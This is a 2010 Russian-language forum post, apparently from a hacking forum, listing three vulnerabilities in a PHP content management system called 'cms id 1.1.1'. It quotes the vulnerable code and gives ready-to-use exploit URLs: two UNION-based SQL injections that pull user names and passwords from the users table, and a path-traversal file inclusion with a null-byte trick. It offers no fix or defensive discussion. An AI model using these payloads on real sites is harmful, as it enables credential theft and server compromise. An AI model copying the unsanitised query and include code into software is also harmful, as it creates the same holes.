27.04.2010, 23:07
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
С нами:
9100556
Репутация:
912
|
|
product:cms id 1.1.1
site:www.cmsid.co.cc
1)SQL-injection
file:application/views/views.php
PHP код:
$id=$_GET['id'];
$hasil = mysql_query("select * from id_views where id=$id");
result:
Код:
/index.php?application=views&id=-9+union+select+1,2,concat_ws(0x3a,name,password),4,5,6+from+id_users+--+
2)SQL-injection
file: application/moduls/news/news.php
PHP код:
case 'views':
$id=$_GET['id'];
$hasil = mysql_query("select * from id_news where id=$id");
result:
Код:
index.php?application=moduls&type=news&action=views&id=-14+union+select+1,2,concat_ws(0x3a,name,password),4,5,6,7,8,9,10,11,12,13+from+id_users+--+
3)LFI(требования: mq=off)
file: index.php
бесит отсутствие отступов ><
PHP код:
switch($_GET['application']) {
....
case 'moduls':
if (file_exists(dir_modul.$_GET['type'].'/'.$_GET['type'].'.php'))
{
require_once(dir_modul.$_GET['type'].'/'.$_GET['type'].'.php');
}else {
header("location:index.php");
exit;
}
break;
result:
Код:
/index.php?application=moduls&type=../../[local_file]%00
Последний раз редактировалось .:[melkiy]:.; 27.04.2010 в 23:10..
|
|
|